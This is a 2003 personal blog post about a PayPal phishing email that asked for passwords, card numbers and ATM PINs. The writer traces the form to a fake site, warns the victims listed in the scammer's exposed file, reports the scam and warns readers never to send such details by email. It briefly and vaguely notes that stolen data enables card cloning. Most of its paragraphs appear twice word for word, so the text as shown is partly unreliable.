![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
Paypal Email Scam
May. 21st, 2003 02:30 amSo, I checked my hotmail account earlier to find an email, supposedly from Paypal, saying that they're checking for inactive accounts and defunct email addresses and asking me to give them my email account, password, credit card number, expiration date and ATM PIN number.
Smelling something suspicious a quick look at the message source revealed that the information they were asking you to fill into a form in the email was being sent to a website that most definitely was not Paypal. Looking at that website I could access a textfile that contained the details of a vast many people who were dumb enough to fill out their details.
I've emailed Paypal, the FCC, the website host and the abuse department of who we think is responsible for the scam, as well as spending a good while harvesting all the email addresses of the people who fell for it and submitted their details, warning them to contact their credit card company or bank as soon as possible to block their account.
Hopefully this will be stopped in its tracks ASAP and nobody loses money over this.
The lesson to learn here is to never ever hand over your creditcard details in an email. Most reputable companies would never ask you to supply this information by something as insecure as email (consider email like a postcard, basically anyone can read it). And I don't know ANY company who would also need your ATM pin number for anything, especially when it's a creditcard transaction. Even your own bank would never ask you to give the PIN number.
Considering PreZ harvested 125 working emails from that file, submitted in maybe a 24 hour period, I'm surprised that so many people fell for this shit. Quite a few people filled in bogus email à la 'fuckyou@blowme.com' with personal info saying 'I'm reporting you' etc. though, so not everyone was so easily fooled. All the person that runs the site needs to do is have one of those creditcard machines that will put information on a blank card, go to an atm with the list in hand of pin numbers and withdraw whatever the hell s/he wants, or shop online til his/her heart's content and rack up huge bills.
Smelling something suspicious a quick look at the message source revealed that the information they were asking you to fill into a form in the email was being sent to a website that most definitely was not Paypal. Looking at that website I could access a textfile that contained the details of a vast many people who were dumb enough to fill out their details.
I've emailed Paypal, the FCC, the website host and the abuse department of who we think is responsible for the scam, as well as spending a good while harvesting all the email addresses of the people who fell for it and submitted their details, warning them to contact their credit card company or bank as soon as possible to block their account.
Hopefully this will be stopped in its tracks ASAP and nobody loses money over this.
The lesson to learn here is to never ever hand over your creditcard details in an email. Most reputable companies would never ask you to supply this information by something as insecure as email (consider email like a postcard, basically anyone can read it). And I don't know ANY company who would also need your ATM pin number for anything, especially when it's a creditcard transaction. Even your own bank would never ask you to give the PIN number.
Considering PreZ harvested 125 working emails from that file, submitted in maybe a 24 hour period, I'm surprised that so many people fell for this shit. Quite a few people filled in bogus email à la 'fuckyou@blowme.com' with personal info saying 'I'm reporting you' etc. though, so not everyone was so easily fooled. All the person that runs the site needs to do is have one of those creditcard machines that will put information on a blank card, go to an atm with the list in hand of pin numbers and withdraw whatever the hell s/he wants, or shop online til his/her heart's content and rack up huge bills.
